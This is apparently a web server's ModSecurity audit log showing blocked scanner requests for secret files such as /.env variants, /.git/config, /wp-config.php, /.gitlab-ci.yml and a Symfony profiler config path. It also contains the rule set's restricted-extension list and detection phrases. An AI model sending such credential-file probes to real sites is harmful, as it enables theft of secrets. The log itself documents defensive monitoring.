[Wed Dec 03 02:24:00.982212 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS-RML1GWlAyvxqgtfInxgAAAAY"]
[Wed Dec 03 02:24:00.982427 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS-RML1GWlAyvxqgtfInxgAAAAY"]
[Wed Dec 03 02:24:00.982673 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS-RML1GWlAyvxqgtfInxgAAAAY"]
[Wed Dec 03 02:24:00.982877 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS-RML1GWlAyvxqgtfInxgAAAAY"]
[Wed Dec 03 02:24:01.231889 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aS-RMb1GWlAyvxqgtfInxwAAAAY"]
[Wed Dec 03 02:24:01.232141 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aS-RMb1GWlAyvxqgtfInxwAAAAY"]
[Wed Dec 03 02:24:01.232374 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aS-RMb1GWlAyvxqgtfInxwAAAAY"]
[Wed Dec 03 02:24:01.463064 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aS-RMb1GWlAyvxqgtfInyAAAAAY"]
[Wed Dec 03 02:24:01.463321 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aS-RMb1GWlAyvxqgtfInyAAAAAY"]
[Wed Dec 03 02:24:01.463514 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aS-RMb1GWlAyvxqgtfInyAAAAAY"]
[Wed Dec 03 02:24:01.663438 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aS-RMb1GWlAyvxqgtfInyQAAAAY"]
[Wed Dec 03 02:24:01.663725 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aS-RMb1GWlAyvxqgtfInyQAAAAY"]
[Wed Dec 03 02:24:01.663955 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aS-RMb1GWlAyvxqgtfInyQAAAAY"]
[Wed Dec 03 04:56:49.654184 2025] [:error] [pid 485928] [client 2.57.122.173:37380] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS-1ASgUodZW5QbjqnuhCQAAAAQ"]
[Wed Dec 03 04:56:49.654598 2025] [:error] [pid 485928] [client 2.57.122.173:37380] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS-1ASgUodZW5QbjqnuhCQAAAAQ"]
[Wed Dec 03 04:56:49.654753 2025] [:error] [pid 485928] [client 2.57.122.173:37380] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS-1ASgUodZW5QbjqnuhCQAAAAQ"]
[Wed Dec 03 12:34:44.802431 2025] [:error] [pid 491164] [client 158.51.121.183:35054] [client 158.51.121.183] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/app_dev.php/_profiler/open"] [unique_id "aTAgVBEPP8WleMQwkpZ1fAAAAAk"]
[Wed Dec 03 12:34:44.802979 2025] [:error] [pid 491164] [client 158.51.121.183:35054] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/app_dev.php/_profiler/open"] [unique_id "aTAgVBEPP8WleMQwkpZ1fAAAAAk"]
[Wed Dec 03 12:34:44.803178 2025] [:error] [pid 491164] [client 158.51.121.183:35054] [client 158.51.121.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/app_dev.php/_profiler/open"] [unique_id "aTAgVBEPP8WleMQwkpZ1fAAAAAk"]
[Wed Dec 03 16:22:41.585590 2025] [:error] [pid 486473] [client 13.209.64.15:34104] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTBVwQStvmwQz1jAeZu4mQAAAAY"]
[Wed Dec 03 16:22:41.585946 2025] [:error] [pid 486473] [client 13.209.64.15:34104] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTBVwQStvmwQz1jAeZu4mQAAAAY"]
[Wed Dec 03 16:22:41.586130 2025] [:error] [pid 486473] [client 13.209.64.15:34104] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTBVwQStvmwQz1jAeZu4mQAAAAY"]
[Wed Dec 03 16:22:42.452473 2025] [:error] [pid 485990] [client 13.209.64.15:34108] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTBVwsRtup1pg_Do4WNEcQAAAAU"]
[Wed Dec 03 16:22:42.452692 2025] [:error] [pid 485990] [client 13.209.64.15:34108] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTBVwsRtup1pg_Do4WNEcQAAAAU"]
[Wed Dec 03 16:22:42.452865 2025] [:error] [pid 485990] [client 13.209.64.15:34108] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTBVwsRtup1pg_Do4WNEcQAAAAU"]
[Wed Dec 03 16:22:43.319989 2025] [:error] [pid 489823] [client 13.209.64.15:33744] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTBVw8yqeBDXRsKLZ9Yi1wAAAAc"]
[Wed Dec 03 16:22:43.320257 2025] [:error] [pid 489823] [client 13.209.64.15:33744] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTBVw8yqeBDXRsKLZ9Yi1wAAAAc"]
[Wed Dec 03 16:22:43.320495 2025] [:error] [pid 489823] [client 13.209.64.15:33744] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTBVw8yqeBDXRsKLZ9Yi1wAAAAc"]
[Wed Dec 03 16:22:44.185184 2025] [:error] [pid 491167] [client 13.209.64.15:33746] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aTBVxFgL17O-r_om6Pek7wAAAAw"]
[Wed Dec 03 16:22:44.185488 2025] [:error] [pid 491167] [client 13.209.64.15:33746] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aTBVxFgL17O-r_om6Pek7wAAAAw"]
[Wed Dec 03 16:22:44.185712 2025] [:error] [pid 491167] [client 13.209.64.15:33746] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aTBVxFgL17O-r_om6Pek7wAAAAw"]
[Wed Dec 03 16:22:45.067729 2025] [:error] [pid 485925] [client 13.209.64.15:33750] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aTBVxRP6ohKwgKc4LRaGAQAAAAE"]
[Wed Dec 03 16:22:45.068137 2025] [:error] [pid 485925] [client 13.209.64.15:33750] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aTBVxRP6ohKwgKc4LRaGAQAAAAE"]
[Wed Dec 03 16:22:45.068371 2025] [:error] [pid 485925] [client 13.209.64.15:33750] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aTBVxRP6ohKwgKc4LRaGAQAAAAE"]
[Wed Dec 03 16:22:45.948222 2025] [:error] [pid 491164] [client 13.209.64.15:33754] [client 13.209.64.15] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTBVxREPP8WleMQwkpZ1kQAAAAk"]
[Wed Dec 03 16:22:45.948394 2025] [:error] [pid 491164] [client 13.209.64.15:33754] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTBVxREPP8WleMQwkpZ1kQAAAAk"]
[Wed Dec 03 16:22:45.948605 2025] [:error] [pid 491164] [client 13.209.64.15:33754] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTBVxREPP8WleMQwkpZ1kQAAAAk"]
[Wed Dec 03 16:22:45.948799 2025] [:error] [pid 491164] [client 13.209.64.15:33754] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTBVxREPP8WleMQwkpZ1kQAAAAk"]
[Wed Dec 03 16:22:46.820952 2025] [:error] [pid 485924] [client 13.209.64.15:33768] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTBVxg8AjgzpEtt471xybAAAAAA"]
